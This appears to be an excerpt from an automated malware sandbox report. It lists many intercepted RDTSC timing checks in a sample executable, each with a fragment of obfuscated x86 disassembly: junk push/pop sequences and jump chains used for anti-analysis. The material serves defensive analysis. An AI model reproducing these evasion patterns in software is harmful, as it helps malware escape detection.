00007F3B34E245FBh 0x00000061 popfd 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B06EC second address: 49B070D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 call 00007F3B34C1F670h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B070D second address: 49B0711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0711 second address: 49B0717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0717 second address: 49B071D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B071D second address: 49B0721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0721 second address: 49B0725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0725 second address: 49B0736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0736 second address: 49B073C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B073C second address: 49B0741 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0741 second address: 49B0751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 lea eax, dword ptr [ebp-04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0751 second address: 49B0755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0755 second address: 49B075B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B075B second address: 49B0781 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ecx, 6FF8F1E9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0781 second address: 49B07C3 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F3B34E245FBh 0x0000000d or cx, 0F1Eh 0x00000012 jmp 00007F3B34E24609h 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F3B34E245FCh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B07C3 second address: 49B0819 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3B34C1F671h 0x00000009 or cl, 00000006h 0x0000000c jmp 00007F3B34C1F671h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F3B34C1F670h 0x00000018 or ax, 5EA8h 0x0000001d jmp 00007F3B34C1F66Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 nop 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0819 second address: 49B081D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B081D second address: 49B0821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0821 second address: 49B0827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0827 second address: 49B0844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B34C1F679h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0844 second address: 49B0848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0873 second address: 49B0901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 call 00007F3B34C1F66Ah 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f cmp dword ptr [ebp-04h], 00000000h 0x00000013 jmp 00007F3B34C1F671h 0x00000018 mov esi, eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F3B34C1F66Ch 0x00000021 or eax, 1B954828h 0x00000027 jmp 00007F3B34C1F66Bh 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007F3B34C1F678h 0x00000033 sbb al, FFFFFF88h 0x00000036 jmp 00007F3B34C1F66Bh 0x0000003b popfd 0x0000003c popad 0x0000003d je 00007F3B34C1F6D5h 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F3B34C1F670h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0901 second address: 49B0905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0905 second address: 49B090B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B098A second address: 49B098E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B098E second address: 49B0994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B0994 second address: 49B09B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E245FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3B34E245FAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B09B5 second address: 49B09BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49B09BB second address: 49A0008 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E245FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d sub esp, 04h 0x00000010 xor ebx, ebx 0x00000012 cmp eax, 00000000h 0x00000015 je 00007F3B34E2475Ah 0x0000001b mov dword ptr [esp], 0000000Dh 0x00000022 call 00007F3B392E0791h 0x00000027 mov edi, edi 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0008 second address: 49A000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A000C second address: 49A0027 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E24607h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0027 second address: 49A004B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A004B second address: 49A004F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A004F second address: 49A0055 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0055 second address: 49A005B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A005B second address: 49A005F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A005F second address: 49A0111 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E245FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F3B34E245FBh 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F3B34E24606h 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a mov eax, 57FC8CCDh 0x0000001f mov cx, 28C9h 0x00000023 popad 0x00000024 sub esp, 2Ch 0x00000027 jmp 00007F3B34E24604h 0x0000002c xchg eax, ebx 0x0000002d pushad 0x0000002e movzx eax, dx 0x00000031 pushfd 0x00000032 jmp 00007F3B34E24603h 0x00000037 xor cl, FFFFFFDEh 0x0000003a jmp 00007F3B34E24609h 0x0000003f popfd 0x00000040 popad 0x00000041 push eax 0x00000042 pushad 0x00000043 mov ebx, 459B95F2h 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F3B34E24609h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0111 second address: 49A0192 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 pushad 0x00000009 mov si, 1B7Fh 0x0000000d call 00007F3B34C1F674h 0x00000012 mov ch, 13h 0x00000014 pop edi 0x00000015 popad 0x00000016 xchg eax, edi 0x00000017 pushad 0x00000018 push eax 0x00000019 pushfd 0x0000001a jmp 00007F3B34C1F66Fh 0x0000001f xor ecx, 6D3C1EAEh 0x00000025 jmp 00007F3B34C1F679h 0x0000002a popfd 0x0000002b pop eax 0x0000002c mov eax, edi 0x0000002e popad 0x0000002f push eax 0x00000030 jmp 00007F3B34C1F66Ah 0x00000035 xchg eax, edi 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F3B34C1F677h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0192 second address: 49A01AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B34E24604h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A01D5 second address: 49A0233 instructions: 0x00000000 rdtsc 0x00000002 mov di, A5C4h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov ebx, 00000000h 0x0000000e jmp 00007F3B34C1F678h 0x00000013 sub edi, edi 0x00000015 pushad 0x00000016 movsx ebx, cx 0x00000019 mov ecx, 7EF3BDAFh 0x0000001e popad 0x0000001f inc ebx 0x00000020 pushad 0x00000021 movsx edx, ax 0x00000024 popad 0x00000025 test al, al 0x00000027 jmp 00007F3B34C1F676h 0x0000002c je 00007F3B34C1F8A2h 0x00000032 pushad 0x00000033 movzx ecx, bx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0233 second address: 49A0237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0237 second address: 49A0264 instructions: 0x00000000 rdtsc 0x00000002 call 00007F3B34C1F66Fh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b lea ecx, dword ptr [ebp-14h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3B34C1F671h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0264 second address: 49A0268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0268 second address: 49A026E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A026E second address: 49A0274 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A029F second address: 49A02D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F672h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F3B34C1F670h 0x0000000f push eax 0x00000010 jmp 00007F3B34C1F66Bh 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A02D9 second address: 49A02DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A02DD second address: 49A02E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0347 second address: 49A034B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A034B second address: 49A034F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A034F second address: 49A0355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0355 second address: 49A03B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3B34C1F678h 0x00000009 add ah, 00000008h 0x0000000c jmp 00007F3B34C1F66Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F3B34C1F678h 0x00000018 add al, 00000068h 0x0000001b jmp 00007F3B34C1F66Bh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 test eax, eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A03B3 second address: 49A03B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A03B7 second address: 49A03BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A03BD second address: 49A03EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 push eax 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F3BA5EE26BAh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F3B34E24608h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A03EA second address: 49A03F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A03F0 second address: 49A0421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E245FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F3B34E24655h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3B34E24607h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0421 second address: 49A0484 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c jmp 00007F3B34C1F66Eh 0x00000011 jne 00007F3BA5CDD6B2h 0x00000017 pushad 0x00000018 jmp 00007F3B34C1F66Eh 0x0000001d mov edi, eax 0x0000001f popad 0x00000020 mov ebx, dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F3B34C1F676h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0484 second address: 49A048A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A048A second address: 49A0490 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0490 second address: 49A0494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0494 second address: 49A04A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-2Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A04A5 second address: 49A04A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A04A9 second address: 49A04AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A04AF second address: 49A04C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B34E245FFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A04C2 second address: 49A0582 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d mov al, 49h 0x0000000f mov edx, 522DD4ACh 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 mov di, ax 0x0000001a push eax 0x0000001b mov edx, 28C21FAEh 0x00000020 pop edx 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 pushad 0x00000024 mov esi, 42FD7B47h 0x00000029 pushfd 0x0000002a jmp 00007F3B34C1F66Ch 0x0000002f xor al, FFFFFFF8h 0x00000032 jmp 00007F3B34C1F66Bh 0x00000037 popfd 0x00000038 popad 0x00000039 nop 0x0000003a jmp 00007F3B34C1F676h 0x0000003f push eax 0x00000040 jmp 00007F3B34C1F66Bh 0x00000045 nop 0x00000046 jmp 00007F3B34C1F676h 0x0000004b xchg eax, ebx 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f pushfd 0x00000050 jmp 00007F3B34C1F66Dh 0x00000055 sbb ecx, 3C0AB2A6h 0x0000005b jmp 00007F3B34C1F671h 0x00000060 popfd 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0582 second address: 49A0587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0587 second address: 49A0606 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F677h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx edi, cx 0x0000000e pushfd 0x0000000f jmp 00007F3B34C1F670h 0x00000014 add al, FFFFFFA8h 0x00000017 jmp 00007F3B34C1F66Bh 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, ebx 0x0000001f pushad 0x00000020 movzx ecx, dx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushfd 0x00000026 jmp 00007F3B34C1F677h 0x0000002b adc cx, C09Eh 0x00000030 jmp 00007F3B34C1F679h 0x00000035 popfd 0x00000036 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0606 second address: 49A060A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A062C second address: 49A0632 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0632 second address: 49A0636 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0636 second address: 49A0670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3B34C1F678h 0x00000013 xor ah, 00000028h 0x00000016 jmp 00007F3B34C1F66Bh 0x0000001b popfd 0x0000001c mov cx, 251Fh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0670 second address: 49A0684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B34E24600h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 49A0684 second address: 4990DCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F66Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d pushad 0x0000000e mov edx, esi 0x00000010 mov di, cx 0x00000013 popad 0x00000014 je 00007F3BA5CDD61Dh 0x0000001a xor eax, eax 0x0000001c jmp 00007F3B34BF8D9Ah 0x00000021 pop esi 0x00000022 pop edi 0x00000023 pop ebx 0x00000024 leave 0x00000025 retn 0004h 0x00000028 nop 0x00000029 sub esp, 04h 0x0000002c mov esi, eax 0x0000002e xor ebx, ebx 0x00000030 cmp esi, 00000000h 0x00000033 je 00007F3B34C1F7A5h 0x00000039 call 00007F3B390CC458h 0x0000003e mov edi, edi 0x00000040 jmp 00007F3B34C1F66Dh 0x00000045 xchg eax, ebp 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F3B34C1F66Dh 0x0000004d rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 4990DCB second address: 4990DD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 4990DD1 second address: 4990DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 4990DD5 second address: 4990E14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ax, C8CBh 0x0000000e movzx esi, di 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 jmp 00007F3B34E24603h 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F3B34E24605h 0x00000021 rdtsc
